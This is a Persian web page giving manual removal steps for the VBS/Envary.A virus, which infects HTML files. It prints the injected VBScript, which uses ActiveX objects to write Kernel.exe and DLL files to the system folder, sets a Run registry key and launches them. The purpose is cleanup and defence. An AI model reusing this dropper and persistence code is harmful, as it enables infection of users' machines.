کدهاي جاوا اسکريپت
دانلود كتاب
دانلود موزيك
دانلود کارتون
گوناگون
تجارت الكترونيك
 
 
تبليغات تصويري
مبل هاي عجيب و زيبا را به نرخ توليدي تهيه کنيد
بازي آنلاين و فکري لرد ها
 

 

 
 
 
 

 

مقابله با ويروس ها

HTML نجات فايل هاي

 سلام من مسعود هستم

يك مشكل جدي دارم مي تونيد درباره اين ويروس كمكم كنيد

VBS/Envary.A virus


 

بايد بر روي سيستم شما

NOD32

نصب شده باشه كه شما به دنبال راه حلي براي

VBS/Envary.A virus
مي گرديد

اين ويروس يا تروجان نام مشخصي ندارد و نوعي كد جاوا اسكريپت هست كه روزگار اهل وب را سياه كرده

نود 32 آن را ويروس
VBS/Envary.A virus
و كسپر اسكاي 2007 آن را تروجان شناسايي مي كند
Trojan.vbs.runner.i
 
چيزي كه بايد بدانيد اين است كه براي اين نوع اسكريپت مخرب آنتي ويروس يا تروجاني كه تنها خود اسكريپت را
حذف بكند ساخته نشده

<script language=vbscript>
on error resume next
dim sys
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set fso = df.createobject("Scripting.FileSystemObject","")
set s=df.CreateObject("Shell.Application.1","")
set re=df.createobject("wscript.shell","")
sys=fso.GetSpecialFolder(1)
For a = 1 To Len(filevbs1) Step 3
filevbs2=filevbs2 & chr(mid(filevbs1,a,3))
if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))
next
kr = UCase(re.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows"))
fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1
if ucase(fso.FileExists(sys & "\Kernel.exe"))="FALSE" or kr<>ucase(sys & "\KERNEL.EXE") then
re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"
fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2
s.Open (sys & "\Kernel.exe")
end if
fso.CreateTextFile(sys & "\TSP32V.DLL").write filevbs1
if fso.opentextfile(sys & "\Systemv.dll",1).readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.vbs").write filevbs2
s.Open (sys & "\Kernel.vbs")
end if
</script>
كل مصيبتي كه بر شما نازل شده فقط  چند خط كد بالاست
 
مقابله و نجات فايلهاتان فقط به همت خودتان بستگي دارد
اگر 1000 فايل اچ تي ام ال در هاردتان داريد بايد براي اين كار حدود 5 ساعت يا كمي بيشتر وقت صرف كنيد
 
 
1
نود سي دو يا كسپر اسكاي را غير فعال كنيد
2
START/Search/For Files OR Folders...
 فايل هاي اچ تي ام ال مورد نظر خودتان را سرچ كنيد
*.htm
زماني كه همه فايل ها در يك پنجره براي نمايش به شما ظاهر شدند
3
روي يكي از آنها راست كليك كرده و گزينه
open with/Choose program / Notepad
را انتخاب كنيد
بعد گزينه
Always use the selected program to open this kind of file
را تيك بزنيد و
ok
4
در هر مرتبه پنجاه يا صد فايل اچ تي ام ال خود را از ليستي كه ابزار سرچ ويندوز فراهم كرده انتخاب و بعد بر روي آنها اينتر بزنيد
محتواي فايل وب به وسيله برنامه
notepad
نمايش داده مي شود
به انتهاي كدها برويد و به دنبال  كلمه
<script language=vbscript>
on error resume next
بگرديد
و از ابتدا تا انتهاي آن را
s.Open (sys & "\Kernel.vbs")
end if
</script>
حذف كنيد
فقط دقت كنيد تا ديگر كدهاي اسكريپ فايل اچ تي ام ال خود را پاك نكنيد
شما مي توانيد براي محكم كاري
TSP32V.DLL
Kernel.exe
TSP32E.DLL
و چند فايل اجرايي و دي ال ال نامبرده در اسكريپت مخرب را در درايو ويندوز را سرچ كرده و حذف كنيد
 
 
بعد نود سي دو را فعال كنيد تا درايو هاي شما را اسكن كند در هر جايي كه

VBS/Envary.A virus

را شناسايي كرد اگر بدان فايل ها نياز داريد ، انتي ويروس خود را غير فعال و بعد با برنامه
notepad
به داخل فايل رفته و اسكريپ مخرب را حذف كنيد
 

نويسنده مطلب : پارس نايس - مقابله با ويروس ها

 
 

 

 

 

 

 

     
Copyright (C) 2007-2017 parsnice25.com All rights reserved
کليه حقوق سايت پارس نايس متعلق به شرکت { پارس نايس انيميشن } مي باشد . طبق قوانين کپي رايت هرگونه نسخه برداري و کپي از مطالب و مقالات سايت ممنوع مي باشد
دانلودفار  | عکس و تصاوير | بازي آنلاين فضايي | خريد مبلمان منزل  | پارس نايس | کالا - شاپ